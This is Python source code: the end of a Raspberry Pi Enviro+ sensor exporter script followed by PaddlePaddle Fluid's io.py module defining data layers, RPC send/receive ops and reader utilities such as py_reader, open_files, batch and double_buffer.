elif value.lower() in {'true', 't', '1', 'yes', 'y'}:
return True
raise ValueError('{} is not a valid boolean value'.format(value))
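# Examples (added): str_to_bool("Yes") -> True, str_to_bool("0") -> False,
# str_to_bool("maybe") raises ValueError. argparse uses this below so the
# boolean flags accept true/false, yes/no, t/f, y/n and 1/0.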
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument("-b", "--bind", metavar='ADDRESS', default='0.0.0.0', help="Specify alternate bind address [default: 0.0.0.0]")
parser.add_argument("-p", "--port", metavar='PORT', default=8000, type=int, help="Specify alternate port [default: 8000]")
parser.add_argument("-f", "--factor", metavar='FACTOR', type=float, help="The compensation factor to get better temperature results when the Enviro+ pHAT is too close to the Raspberry Pi board")
parser.add_argument("-e", "--enviro", metavar='ENVIRO', type=str_to_bool, help="Device is an Enviro (not Enviro+) so don't fetch data from gas and particulate sensors as they don't exist")
parser.add_argument("-d", "--debug", metavar='DEBUG', type=str_to_bool, help="Turns on more verbose logging, showing sensor output and post responses [default: false]")
parser.add_argument("-i", "--influxdb", metavar='INFLUXDB', type=str_to_bool, default='false', help="Post sensor data to InfluxDB [default: false]")
parser.add_argument("-l", "--luftdaten", metavar='LUFTDATEN', type=str_to_bool, default='false', help="Post sensor data to Luftdaten [default: false]")
args = parser.parse_args()
# Start up the server to expose the metrics.
start_http_server(addr=args.bind, port=args.port)
# Generate some requests.
if args.debug:
DEBUG = True
if args.factor:
logging.info("Using compensating algorithm (factor={}) to account for heat leakage from Raspberry Pi board".format(args.factor))
if args.influxdb:
# Post to InfluxDB in another thread
logging.info("Sensor data will be posted to InfluxDB every {} seconds".format(INFLUXDB_TIME_BETWEEN_POSTS))
influx_thread = Thread(target=post_to_influxdb)
influx_thread.start()
if args.luftdaten:
# Post to Luftdaten in another thread
LUFTDATEN_SENSOR_UID = 'raspi-' + get_serial_number()
logging.info("Sensor data will be posted to Luftdaten every {} seconds for the UID {}".format(LUFTDATEN_TIME_BETWEEN_POSTS, LUFTDATEN_SENSOR_UID))
luftdaten_thread = Thread(target=post_to_luftdaten)
luftdaten_thread.start()
logging.info("Listening on http://{}:{}".format(args.bind, args.port))
while True:
time.sleep(0.5)
get_temperature(args.factor)
get_pressure()
get_humidity()
get_light()
if not args.enviro:
get_gas()
# get_particulates()
if DEBUG:
logging.info('Sensor data: {}'.format(collect_all_data()))
|
io.py
|
# Copyright (c) 2018 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import print_function
from ..wrapped_decorator import signature_safe_contextmanager
import multiprocessing
import os
import six
import threading
from ..data_feeder import DataFeeder
from .control_flow import BlockGuard
from .layer_function_generator import templatedoc
from .. import core
from ..executor import global_scope
from ..framework import convert_np_dtype_to_dtype_, default_main_program, \
default_startup_program, program_guard, Program, Variable
from ..layer_helper import LayerHelper
from ..unique_name import generate as unique_name
__all__ = [
'data', 'open_files', 'read_file', 'shuffle', 'batch', 'double_buffer',
'random_data_generator', 'py_reader', 'create_py_reader_by_data',
'Preprocessor', 'load'
]
def data(name,
shape,
append_batch_size=True,
dtype='float32',
lod_level=0,
type=core.VarDesc.VarType.LOD_TENSOR,
stop_gradient=True):
"""
**Data Layer**
This function takes in the input and based on whether data has
to be returned back as a minibatch, it creates the global variable by using
the helper functions. The global variables can be accessed by all the
following operators in the graph.
All the input variables of this function are passed in as local variables
to the LayerHelper constructor.
Args:
name(str): The name/alias of the function
shape(list): Tuple declaring the shape. If :code:`append_batch_size` is
True and there is no -1 inside :code:`shape`, it should be
considered as the shape of the each sample. Otherwise, it
should be considered as the shape of the batched data.
append_batch_size(bool):
1. If true, it prepends -1 to the shape.
For example if shape=[1], the resulting shape is [-1, 1].
2. If shape contains -1, such as shape=[1, -1],
               append_batch_size will be enforced to be False (ineffective).
dtype(np.dtype|VarType|str): The type of data : float32, float16, int etc
type(VarType): The output type. By default it is LOD_TENSOR.
lod_level(int): The LoD Level. 0 means the input data is not a sequence.
stop_gradient(bool): A boolean that mentions whether gradient should flow.
Returns:
Variable: The global variable that gives access to the data.
Examples:
.. code-block:: python
data = fluid.layers.data(name='x', shape=[784], dtype='float32')
"""
helper = LayerHelper('data', **locals())
shape = list(shape)
for i in six.moves.range(len(shape)):
if shape[i] is None:
shape[i] = -1
append_batch_size = False
elif shape[i] < 0:
append_batch_size = False
if append_batch_size:
shape = [-1] + shape # append batch size as -1
data_var = helper.create_global_variable(
name=name,
shape=shape,
dtype=dtype,
type=type,
stop_gradient=stop_gradient,
lod_level=lod_level,
is_data=True)
return data_var
class BlockGuardServ(BlockGuard):
"""
BlockGuardServ class.
BlockGuardServ class is used to create an op with a block in a program.
"""
def __init__(self, server):
if not (isinstance(server, ListenAndServ)):
raise TypeError("BlockGuardServ takes a ListenAndServ")
super(BlockGuardServ, self).__init__(server.helper.main_program)
self.server = server
def __exit__(self, exc_type, exc_val, exc_tb):
if exc_type is not None:
return False
self.server.complete_op()
return super(BlockGuardServ, self).__exit__(exc_type, exc_val, exc_tb)
class ListenAndServ(object):
"""
**ListenAndServ Layer**
    ListenAndServ is used to create an RPC server that binds and listens
    on a specific TCP port; the server runs the sub-block when it
    receives variables from clients.
Args:
endpoint(string): IP:port string which the server will listen on.
inputs(list): a list of variables that the server will get from clients.
        fan_in(int): how many clients are expected to report to this server, default: 1.
optimizer_mode(bool): whether to run the server as a parameter server, default: True.
Examples:
.. code-block:: python
with fluid.program_guard(main):
serv = layers.ListenAndServ(
"127.0.0.1:6170", ["X"], optimizer_mode=False)
with serv.do():
x = layers.data(
shape=[32, 32],
dtype='float32',
name="X",
append_batch_size=False)
fluid.initializer.Constant(value=1.0)(x, main.global_block())
layers.scale(x=x, scale=10.0, out=out_var)
exe = fluid.Executor(place)
exe.run(main)
"""
def __init__(self, endpoint, inputs, fan_in=1, optimizer_mode=True):
self.helper = LayerHelper("listen_and_serv")
self.inputs = inputs
self.outputs = []
self.endpoint = endpoint
self.fan_in = fan_in
# FIXME(typhoonzero): add optimizer_mode is stupid, should make it more
# general.
self.optimizer_mode = optimizer_mode
def do(self):
return BlockGuardServ(self)
def get_params_and_grads(self):
main_program = self.helper.main_program
current_block = main_program.current_block()
parent_block = self.parent_block()
# params and grads in the same order.
params = list()
grads = list()
for op in current_block.ops:
# FIXME(typhoonzero): op.inputs is None if it's cloned.
if self.optimizer_mode:
if "Grad" in op.inputs and "Param" in op.inputs:
params.append(op.inputs["Param"].name)
grads.append(op.inputs["Grad"].name)
else:
# simple recv mode, recv operators inputs.
for iname in op.input_names:
for in_var_name in op.input(iname):
params.append(parent_block.var(in_var_name))
grads.append(parent_block.var(in_var_name))
return params, grads
def parent_block(self):
prog = self.helper.main_program
parent_idx = prog.current_block().parent_idx
assert parent_idx >= 0
parent_block = prog.block(parent_idx)
return parent_block
def complete_op(self):
main_program = self.helper.main_program
current_block = main_program.current_block()
parent_block = self.parent_block()
parent_block.append_op(
type='listen_and_serv',
inputs={"X": self.inputs},
outputs={},
attrs={
'endpoint': self.endpoint,
'Fanin': self.fan_in,
'optimize_blocks': [
current_block
], # did not support multiple optimize blocks in layers
'sync_mode': True, # did not support async now in layers
'grad_to_block_id': [""]
})
def Send(endpoints, send_vars, dummy_output=None, sync=True):
"""
    Send variables to the server side, and get vars from the server
    side when the server has finished running the server side program.
    Args:
        endpoints (str): comma separated IP:PORT pairs in the order
            of send_vars to send
        send_vars (list): variables to send to server
        sync (bool): whether to wait for the request to finish
"""
assert (type(send_vars) == list)
if dummy_output is None:
dummy_output = []
elif isinstance(dummy_output, Variable):
dummy_output = [dummy_output]
assert (type(dummy_output) == list)
epmap = endpoints.split(",")
endpoints = list(set(epmap))
helper = LayerHelper("Send", **locals())
rpc_op_role_name = core.op_proto_and_checker_maker.kOpRoleAttrName()
helper.append_op(
type="send",
inputs={"X": send_vars},
outputs={"Out": dummy_output},
attrs={
"endpoints": endpoints,
"epmap": epmap,
rpc_op_role_name: core.op_proto_and_checker_maker.OpRole.RPC
})
if sync:
helper.append_op(
type="send_barrier",
inputs={"X": dummy_output},
outputs={"Out": []},
attrs={"endpoints": endpoints})
def Recv(endpoints, get_vars, dummy_input=None, sync=True):
"""
Receive variables from server side
Args:
        endpoints (str): comma separated IP:PORT pairs in the order
            of get_vars to receive
        get_vars (list): vars to get from server after send completes.
        sync (bool): whether to wait for the request to finish
Returns:
list: list of received variables
"""
assert (type(get_vars) == list)
if dummy_input is None:
dummy_input = []
elif isinstance(dummy_input, Variable):
dummy_input = [dummy_input]
assert (type(dummy_input) == list)
epmap = endpoints.split(",")
endpoints = list(set(epmap))
helper = LayerHelper("Recv", **locals())
helper.append_op(
type="recv",
inputs={"X": dummy_input},
outputs={"Out": get_vars},
attrs={"endpoints": endpoints,
"epmap": epmap})
if sync:
helper.append_op(
type="fetch_barrier",
outputs={"Out": get_vars},
attrs={"endpoints": endpoints})
return get_vars
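# Sketch (added, not in the original source): Send and Recv are typically
# paired against a running listen_and_serv endpoint; the address is the same
# illustrative one used in the ListenAndServ docstring above.
#     Send("127.0.0.1:6170", [x])
#     y = Recv("127.0.0.1:6170", [y])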
def monkey_patch_reader_methods(reader):
def __get_reader__():
scope = global_scope()
var = scope.find_var(reader.name)
return var.get_reader()
def reset():
return __get_reader__().reset()
reader.reset = reset
reader.stop_gradient = True
reader.persistable = True
return reader
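# Note (added): monkey_patch_reader_methods looks the reader up in the global
# scope, attaches a reset() bound to the underlying C++ reader, and marks the
# variable persistable; every reader-creating API below returns through it.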
def _copy_reader_var_(block, var):
new_var = block.create_var(name=var.name, type=core.VarDesc.VarType.READER)
new_var.desc.set_shapes(var.desc.shapes())
new_var.desc.set_dtypes(var.desc.dtypes())
new_var.desc.set_lod_levels(var.desc.lod_levels())
new_var.persistable = True
return new_var
def _copy_reader_create_op_(block, op):
input_param_names = op.input_names
new_input_map = {}
for param_name in input_param_names:
new_input_map[param_name] = []
arg_names = op.input(param_name)
for arg_name in arg_names:
new_input_map[param_name].append(block.var(arg_name))
output_param_names = op.output_names
new_output_map = {}
for param_name in output_param_names:
new_output_map[param_name] = []
arg_names = op.output(param_name)
for arg_name in arg_names:
new_output_map[param_name].append(block.var(arg_name))
new_op = block.append_op(
type=op.type,
inputs=new_input_map,
outputs=new_output_map,
attrs=op.all_attrs())
return new_op
@templatedoc(op_type='create_recordio_file_reader')
def open_recordio_file(filename,
shapes,
lod_levels,
dtypes,
pass_num=1,
for_parallel=True):
"""
${comment}
Args:
filename(${filename_type}): ${filename_comment}.
shapes(list): List of tuples which declaring data shapes.
lod_levels(${lod_levels_type}): ${lod_levels_comment}.
dtypes(list): List of strs which declaring data type.
pass_num(int): Number of passes to run.
for_parallel(Bool): Set it as True if you are going to run
subsequent operators in parallel.
Returns:
${out_comment}.
Examples:
>>> import paddle.fluid as fluid
>>> reader = fluid.layers.io.open_recordio_file(
>>> filename='./data.recordio',
>>> shapes=[(3,224,224), (1,)],
>>> lod_levels=[0, 0],
>>> dtypes=['float32', 'int64'])
>>> # Via the reader, we can use 'read_file' layer to get data:
>>> image, label = fluid.layers.io.read_file(reader)
"""
dtypes = [convert_np_dtype_to_dtype_(dt) for dt in dtypes]
shape_concat = []
ranks = []
for shape in shapes:
shape_concat.extend(shape)
ranks.append(len(shape))
var_name = unique_name('open_recordio_file')
startup_blk = default_startup_program().current_block()
startup_var = startup_blk.create_var(name=var_name)
startup_blk.append_op(
type='create_recordio_file_reader',
outputs={'Out': [startup_var]},
attrs={
'shape_concat': shape_concat,
'lod_levels': lod_levels,
'filename': filename,
'ranks': ranks
})
startup_var.desc.set_dtypes(dtypes)
startup_var.persistable = True
main_prog_var = _copy_reader_var_(default_main_program().current_block(),
startup_var)
if pass_num > 1:
main_prog_var = multi_pass(reader=main_prog_var, pass_num=pass_num)
return monkey_patch_reader_methods(main_prog_var)
def random_data_generator(low, high, shapes, lod_levels, for_parallel=True):
"""
Create a uniform random data generator
This layer returns a Reader Variable.
Instead of opening a file and reading data from it, this
Reader Variable generates float uniform random data by itself.
It can be used as a dummy reader to test a network without
opening a real file.
Args:
low(float): The lower bound of data's uniform distribution.
high(float): The upper bound of data's uniform distribution.
shapes(list): List of tuples which declaring data shapes.
lod_levels(list): List of ints which declaring data lod_level.
for_parallel(Bool): Set it as True if you are going to run
subsequent operators in parallel.
Returns:
Variable: A Reader Variable from which we can get random data.
Examples:
.. code-block:: python
reader = fluid.layers.random_data_generator(
low=0.0,
high=1.0,
shapes=[[3,224,224], [1]],
lod_levels=[0, 0])
# Via the reader, we can use 'read_file' layer to get data:
image, label = fluid.layers.read_file(reader)
"""
dtypes = [core.VarDesc.VarType.FP32] * len(shapes)
shape_concat = []
ranks = []
for shape in shapes:
shape_concat.extend(shape)
ranks.append(len(shape))
var_name = unique_name('random_data_generator')
startup_blk = default_startup_program().current_block()
startup_var = startup_blk.create_var(name=var_name)
startup_blk.append_op(
type='create_random_data_generator',
outputs={'Out': [startup_var]},
attrs={
'low': low,
'high': high,
'shape_concat': shape_concat,
'lod_levels': lod_levels,
'ranks': ranks
})
startup_var.desc.set_dtypes(dtypes)
startup_var.persistable = True
main_prog_var = _copy_reader_var_(default_main_program().current_block(),
startup_var)
return monkey_patch_reader_methods(main_prog_var)
def _py_reader(capacity,
shapes,
dtypes,
lod_levels=None,
name=None,
use_double_buffer=True,
feed_list=None):
if feed_list is not None:
if not isinstance(feed_list, list):
raise TypeError("feed_list should be a list of Variable"
" instead of " + str(type(feed_list)))
lod_levels = []
dtypes = []
shape_concat = []
ranks = []
shapes = []
for feed_data in feed_list:
dtypes.append(feed_data.dtype)
shape_concat.extend(feed_data.shape)
ranks.append(len(feed_data.shape))
shapes.append(feed_data.shape)
lod_levels.append(feed_data.lod_level)
else:
dtypes = [convert_np_dtype_to_dtype_(dt) for dt in dtypes]
shape_concat = []
ranks = []
for shape in shapes:
shape_concat.extend(shape)
ranks.append(len(shape))
if lod_levels is None:
lod_levels = [0] * len(shapes)
if name is None:
queue_name = unique_name('lod_tensor_blocking_queue')
reader_name = unique_name('create_py_reader')
double_buffer_name = unique_name('double_buffer')
else:
queue_name = "_".join([name, "queue"])
reader_name = "_".join([name, "reader"])
double_buffer_name = "_".join([name, "double_buffer"])
var = global_scope().var(queue_name)
feed_queue = core.init_lod_tensor_blocking_queue(var, capacity)
startup_blk = default_startup_program().current_block()
startup_var = startup_blk.create_var(name=reader_name)
startup_blk.append_op(
type='create_py_reader',
inputs={'blocking_queue': [queue_name]},
outputs={'Out': [startup_var]},
attrs={
'shape_concat': shape_concat,
'lod_levels': lod_levels,
'ranks': ranks
})
startup_var.desc.set_dtypes(dtypes)
startup_var.persistable = True
main_prog_var = _copy_reader_var_(default_main_program().current_block(),
startup_var)
reader = monkey_patch_reader_methods(main_prog_var)
if use_double_buffer:
double_buffer_reader = double_buffer(reader, name=double_buffer_name)
# we return a double buffer reader. However, the reset method comes from
# py_reader.
double_buffer_reader.reset = reader.reset
reader = double_buffer_reader
# monkey patch py_reader special methods
reader.queue = feed_queue
current_reset_method = reader.reset
reader.thread = None
reader.tensor_provider = None
reader.exited = False
def start_provide_thread(func):
def __provider_thread__():
try:
for tensors in func():
array = core.LoDTensorArray()
for item in tensors:
if not isinstance(item, core.LoDTensor):
tmp = core.LoDTensor()
tmp.set(item, core.CPUPlace())
item = tmp
array.append(item)
if reader.exited:
break
feed_queue.push(array)
if reader.exited:
break
feed_queue.close()
except Exception as ex:
feed_queue.close()
raise ex
reader.thread = threading.Thread(target=__provider_thread__)
reader.thread.daemon = True
reader.thread.start()
def __set_tensor_provider__(func):
reader.tensor_provider = func
def __set_paddle_reader__(paddle_reader):
with program_guard(Program(), Program()):
actual_feed_list = feed_list
if actual_feed_list is None:
actual_feed_list = []
counter = 0
for dtype, shape, lod_level in zip(dtypes, shapes, lod_levels):
name = str(counter)
actual_feed_list.append(
data(
name=name,
dtype=dtype,
shape=shape,
lod_level=lod_level))
counter += 1
data_names = [feed_data.name for feed_data in actual_feed_list]
feeder = DataFeeder(
feed_list=actual_feed_list, place=core.CPUPlace())
paddle_reader = feeder.decorate_reader(
paddle_reader, multi_devices=False)
def __tensor_provider__():
for slots in paddle_reader():
yield [slots[data_name] for data_name in data_names]
__set_tensor_provider__(__tensor_provider__)
def __reset__():
current_reset_method()
if reader.thread is not None and reader.tensor_provider is not None:
reader.exited = True
reader.thread.join()
reader.exited = False
def __start__():
start_provide_thread(reader.tensor_provider)
reader.reset = __reset__
reader.decorate_tensor_provider = __set_tensor_provider__
reader.decorate_paddle_reader = __set_paddle_reader__
reader.decorate_batch_generator = __set_tensor_provider__
reader.decorate_sample_list_generator = __set_paddle_reader__
reader.start = __start__
return reader
def py_reader(capacity,
shapes,
dtypes,
lod_levels=None,
name=None,
use_double_buffer=True):
"""
Create a Python reader for data feeding in Python
This layer returns a Reader Variable.
The Reader provides :code:`decorate_paddle_reader()` and
:code:`decorate_tensor_provider()` to set a Python generator as the data
source in Python side. When :code:`Executor::Run()` is invoked in C++
side, the data from the generator would be read automatically. Unlike
:code:`DataFeeder.feed()`, the data reading process and
:code:`Executor::Run()` process can run in parallel using
:code:`py_reader`. The :code:`start()` method of the Reader should be
called when each pass begins, while the :code:`reset()` method should be
called when the pass ends and :code:`fluid.core.EOFException` raises.
Note that :code:`Program.clone()` method cannot clone :code:`py_reader`.
Args:
capacity(int): The buffer capacity maintained by :code:`py_reader`.
shapes(list|tuple): List of tuples which declaring data shapes.
dtypes(list|tuple): List of strs which declaring data type.
lod_levels(list|tuple): List of ints which declaring data lod_level.
name(basestring): The prefix Python queue name and Reader name. None will
be generated automatically.
use_double_buffer(bool): Whether use double buffer or not.
Returns:
Variable: A Reader from which we can get feeding data.
Examples:
1. The basic usage of :code:`py_reader` is as follows:
.. code-block:: python
import paddle
import paddle.fluid as fluid
import paddle.dataset.mnist as mnist
def network(image, label):
               # user defined network, here a softmax regression example
predict = fluid.layers.fc(input=image, size=10, act='softmax')
return fluid.layers.cross_entropy(input=predict, label=label)
reader = fluid.layers.py_reader(capacity=64,
shapes=[(-1, 1, 28, 28), (-1, 1)],
dtypes=['float32', 'int64'])
reader.decorate_paddle_reader(
paddle.reader.shuffle(paddle.batch(mnist.train(), batch_size=5),
buf_size=1000))
img, label = fluid.layers.read_file(reader)
loss = network(img, label)
fluid.Executor(fluid.CUDAPlace(0)).run(fluid.default_startup_program())
exe = fluid.ParallelExecutor(use_cuda=True)
for epoch_id in range(10):
reader.start()
try:
while True:
exe.run(fetch_list=[loss.name])
except fluid.core.EOFException:
reader.reset()
fluid.io.save_inference_model(dirname='./model',
feeded_var_names=[img.name, label.name],
target_vars=[loss],
executor=fluid.Executor(fluid.CUDAPlace(0)))
2. When training and testing are both performed, two different
:code:`py_reader` should be created with different names, e.g.:
.. code-block:: python
import paddle
import paddle.fluid as fluid
import paddle.dataset.mnist as mnist
def network(reader):
img, label = fluid.layers.read_file(reader)
# User defined network. Here a simple regression as example
predict = fluid.layers.fc(input=img, size=10, act='softmax')
loss = fluid.layers.cross_entropy(input=predict, label=label)
return fluid.layers.mean(loss)
# Create train_main_prog and train_startup_prog
train_main_prog = fluid.Program()
train_startup_prog = fluid.Program()
with fluid.program_guard(train_main_prog, train_startup_prog):
# Use fluid.unique_name.guard() to share parameters with test program
with fluid.unique_name.guard():
train_reader = fluid.layers.py_reader(capacity=64,
shapes=[(-1, 1, 28, 28),
(-1, 1)],
dtypes=['float32', 'int64'],
name='train_reader')
train_reader.decorate_paddle_reader(
paddle.reader.shuffle(paddle.batch(mnist.train(), batch_size=5),
buf_size=500))
train_loss = network(train_reader) # some network definition
adam = fluid.optimizer.Adam(learning_rate=0.01)
adam.minimize(train_loss)
# Create test_main_prog and test_startup_prog
test_main_prog = fluid.Program()
test_startup_prog = fluid.Program()
with fluid.program_guard(test_main_prog, test_startup_prog):
# Use fluid.unique_name.guard() to share parameters with train program
with fluid.unique_name.guard():
test_reader = fluid.layers.py_reader(capacity=32,
shapes=[(-1, 1, 28, 28), (-1, 1)],
dtypes=['float32', 'int64'],
name='test_reader')
test_reader.decorate_paddle_reader(paddle.batch(mnist.test(), 512))
test_loss = network(test_reader)
fluid.Executor(fluid.CUDAPlace(0)).run(train_startup_prog)
fluid.Executor(fluid.CUDAPlace(0)).run(test_startup_prog)
train_exe = fluid.ParallelExecutor(use_cuda=True,
loss_name=train_loss.name,
main_program=train_main_prog)
test_exe = fluid.ParallelExecutor(use_cuda=True,
loss_name=test_loss.name,
main_program=test_main_prog)
for epoch_id in range(10):
train_reader.start()
try:
while True:
train_exe.run(fetch_list=[train_loss.name])
except fluid.core.EOFException:
train_reader.reset()
test_reader.start()
try:
while True:
test_exe.run(fetch_list=[test_loss.name])
except fluid.core.EOFException:
test_reader.reset()
"""
return _py_reader(
capacity=capacity,
shapes=shapes,
dtypes=dtypes,
lod_levels=lod_levels,
name=name,
use_double_buffer=use_double_buffer)
def create_py_reader_by_data(capacity,
feed_list,
name=None,
use_double_buffer=True):
"""
Create a Python reader for data feeding in Python
This layer returns a Reader Variable.
    Works much like py_reader except that its input is a feed_list
    instead of shapes, dtypes and lod_levels
Args:
capacity(int): The buffer capacity maintained by :code:`py_reader`.
feed_list(list(Variable)): The data feed list.
name(basestring): The prefix Python queue name and Reader name. None will
be generated automatically.
use_double_buffer(bool): Whether use double buffer or not.
Returns:
Variable: A Reader from which we can get feeding data.
Examples:
.. code-block:: python
import paddle
import paddle.fluid as fluid
import paddle.dataset.mnist as mnist
def network(img, label):
# User defined network. Here a simple regression as example
predict = fluid.layers.fc(input=img, size=10, act='softmax')
loss = fluid.layers.cross_entropy(input=predict, label=label)
return fluid.layers.mean(loss)
image = fluid.layers.data(name='image', shape=[1, 28, 28], dtype='float32')
label = fluid.layers.data(name='label', shape=[1], dtype='int64')
reader = fluid.layers.create_py_reader_by_data(capacity=64,
feed_list=[image, label])
reader.decorate_paddle_reader(
paddle.reader.shuffle(paddle.batch(mnist.train(), batch_size=5),
buf_size=500))
img, label = fluid.layers.read_file(reader)
loss = network(img, label) # some network definition
fluid.Executor(fluid.CUDAPlace(0)).run(fluid.default_startup_program())
exe = fluid.ParallelExecutor(use_cuda=True, loss_name=loss.name)
for epoch_id in range(10):
reader.start()
try:
while True:
exe.run(fetch_list=[loss.name])
except fluid.core.EOFException:
reader.reset()
"""
return _py_reader(
capacity=capacity,
shapes=None,
dtypes=None,
lod_levels=None,
name=name,
use_double_buffer=use_double_buffer,
feed_list=feed_list)
def open_files(filenames,
shapes,
lod_levels,
dtypes,
thread_num=None,
buffer_size=None,
pass_num=1,
is_test=None):
"""
Open files
This layer takes a list of files to read from and returns a Reader Variable.
Via the Reader Variable, we can get data from given files. All files must
    have name suffixes to indicate their formats, e.g., '*.recordio'.
Args:
filenames(list): The list of file names.
shapes(list): List of tuples which declaring data shapes.
lod_levels(list): List of ints which declaring data lod_level.
dtypes(list): List of strs which declaring data type.
        thread_num(None): The number of threads used to read files.
            Default: min(len(filenames), cpu_number).
        buffer_size(None): The buffer size of the reader. Default: 3 * thread_num
pass_num(int): Number of passes to run.
        is_test(bool|None): Whether `open_files` is used for testing or not. If it
            is used for testing, the order of data generated is the same as the
            file order. Otherwise, it is not guaranteed that the order of data
            is the same between epochs. [Default: False].
Returns:
Variable: A Reader Variable via which we can get file data.
Examples:
.. code-block:: python
reader = fluid.layers.io.open_files(filenames=['./data1.recordio',
'./data2.recordio'],
shapes=[(3,224,224), (1,)],
lod_levels=[0, 0],
dtypes=['float32', 'int64'])
# Via the reader, we can use 'read_file' layer to get data:
image, label = fluid.layers.io.read_file(reader)
"""
if thread_num is None:
thread_num = min(len(filenames), multiprocessing.cpu_count())
else:
thread_num = int(thread_num)
if buffer_size is None:
buffer_size = 3 * thread_num
else:
buffer_size = int(buffer_size)
if isinstance(filenames, six.string_types):
filenames = [filenames]
dtypes = [convert_np_dtype_to_dtype_(dt) for dt in dtypes]
shape_concat = []
ranks = []
for shape in shapes:
shape_concat.extend(shape)
ranks.append(len(shape))
multi_file_reader_name = unique_name('multi_file_reader')
startup_blk = default_startup_program().current_block()
startup_reader = startup_blk.create_var(name=multi_file_reader_name)
attrs = {
'shape_concat': shape_concat,
'lod_levels': lod_levels,
'ranks': ranks,
'file_names': filenames,
'thread_num': thread_num,
'buffer_size': buffer_size
}
if is_test is not None:
attrs['is_test'] = is_test
startup_blk.append_op(
type='open_files', outputs={'Out': [startup_reader]}, attrs=attrs)
startup_reader.desc.set_dtypes(dtypes)
startup_reader.persistable = True
main_prog_reader = _copy_reader_var_(default_main_program().current_block(),
startup_reader)
if pass_num > 1:
main_prog_reader = multi_pass(
reader=main_prog_reader, pass_num=pass_num)
return monkey_patch_reader_methods(main_prog_reader)
def __create_shared_decorated_reader__(op_type, reader, attrs):
var_name = unique_name(op_type)
startup_blk = default_startup_program().current_block()
startup_var = startup_blk.create_var(name=var_name)
startop_op = startup_blk.append_op(
type=op_type,
inputs={'UnderlyingReader': reader},
outputs={'Out': [startup_var]},
attrs=attrs)
startup_var.persistable = True
main_prog_block = default_main_program().current_block()
main_prog_var = _copy_reader_var_(main_prog_block, startup_var)
_copy_reader_create_op_(main_prog_block, startop_op)
return monkey_patch_reader_methods(main_prog_var)
def __create_unshared_decorated_reader__(op_type, reader, attrs, name=None):
new_reader_name = name if name is not None else unique_name(op_type)
main_blk = default_main_program().current_block()
new_reader = main_blk.create_var(name=new_reader_name)
main_blk.append_op(
type=op_type,
inputs={'UnderlyingReader': reader},
outputs={'Out': [new_reader]},
attrs=attrs)
return monkey_patch_reader_methods(new_reader)
def shuffle(reader, buffer_size):
"""
Creates a data reader whose data output is shuffled.
    Output from the iterator created by the original reader will be
    buffered into a shuffle buffer, and then shuffled. The size of the shuffle
    buffer is determined by the argument buffer_size.
    Args:
        reader(callable): the original reader whose output will be shuffled.
        buffer_size(int): shuffle buffer size.
Returns:
callable: the new reader whose output is shuffled.
"""
return __create_unshared_decorated_reader__(
'create_shuffle_reader', reader, {'buffer_size': int(buffer_size)})
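# Example (sketch, added; mirrors the batch() example below and assumes
# raw_reader comes from fluid.layers.io.open_files):
#     shuffled_reader = fluid.layers.shuffle(reader=raw_reader, buffer_size=64)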
def batch(reader, batch_size):
"""
    This layer is a reader decorator. It takes a reader and adds
    'batching' decoration on it. When reading with the resulting
    decorated reader, output data will be automatically organized
    into batches.
Args:
reader(Variable): The reader to be decorated with 'batching'.
batch_size(int): The batch size.
Returns:
Variable: The reader which has been decorated with 'batching'.
Examples:
.. code-block:: python
raw_reader = fluid.layers.io.open_files(filenames=['./data1.recordio',
'./data2.recordio'],
shapes=[(3,224,224), (1,)],
lod_levels=[0, 0],
dtypes=['float32', 'int64'],
thread_num=2,
buffer_size=2)
batch_reader = fluid.layers.batch(reader=raw_reader, batch_size=5)
# If we read data with the raw_reader:
# data = fluid.layers.read_file(raw_reader)
# We can only get data instance by instance.
#
# However, if we read data with the batch_reader:
# data = fluid.layers.read_file(batch_reader)
# Each 5 adjacent instances will be automatically combined together
# to become a batch. So what we get('data') is a batch data instead
# of an instance.
"""
return __create_unshared_decorated_reader__(
'create_batch_reader', reader, {'batch_size': int(batch_size)})
def double_buffer(reader, place=None, name=None):
"""
    Wrap a double buffer reader. The data will be copied to the target place
    with a double buffer queue. If the target place is None, the place where
    the executor runs will be used.
Args:
reader(Variable): the reader variable need to be wrapped.
        place(Place): the place of target data. Default is the place where the
            executor runs.
name(str): Variable name. None if the user does not care.
Returns:
wrapped reader with double buffer.
Examples:
>>> reader = fluid.layers.open_files(filenames=['somefile'],
>>> shapes=[[-1, 784], [-1, 1]],
>>> dtypes=['float32', 'int64'])
>>> reader = fluid.layers.double_buffer(reader)
>>> img, label = fluid.layers.read_file(reader)
"""
attrs = dict()
if place is not None:
attrs['place'] = str(place).upper()
return __create_unshared_decorated_reader__(
'create_double_buffer_reader', reader, attrs, name=name)
def multi_pass(reader, pass_num):
return __create_shared_decorated_reader__(
'create_multi_pass_reader', reader, {'pass_num': int(pass_num)})
def read_file(reader):
"""
Execute the given reader and get data via it.
A reader is also a Variable. It can be a raw reader generated by
`fluid.layers.open_files()` or a decorated one generated by
`fluid.layers.double_buffer()` and so on.
Args:
reader(Variable): The reader to execute.
Returns:
Tuple[Variable]: Data read via the given reader.
Examples:
.. code-block:: python
data_file = fluid.layers.open_files(
filenames=['mnist.recordio'],
shapes=[(-1, 748), (-1, 1)],
lod_levels=[0, 0],
dtypes=["float32", "int64"])
data_file = fluid.layers.double_buffer(
fluid.layers.batch(data_file, batch_size=64))
input, label = fluid.layers.read_file(data_file)
"""
helper = LayerHelper('read_file')
out = [
helper.create_variable_for_type_inference(
stop_gradient=True, dtype='float32')
for _ in range(len(reader.desc.shapes()))
]
helper.append_op(
type='read', inputs={'Reader': [reader]}, outputs={'Out': out})
if len(out) == 1:
return out[0]
else:
return out
class Preprocessor(object):
"""
A block for data pre-processing in reader.
Args:
reader (Variable): A reader variable.
name (str, default None): The name of the reader.
Examples:
.. code-block:: python
reader = fluid.layers.io.open_files(
filenames=['./data1.recordio', './data2.recordio'],
shapes=[(3, 224, 224), (1, )],
lod_levels=[0, 0],
dtypes=['float32', 'int64'])
preprocessor = fluid.layers.io.Preprocessor(reader=reader)
with preprocessor.block():
img, lbl = preprocessor.inputs()
img_out = img / 2
lbl_out = lbl + 1
preprocessor.outputs(img_out, lbl_out)
data_file = fluid.layers.io.double_buffer(preprocessor())
"""
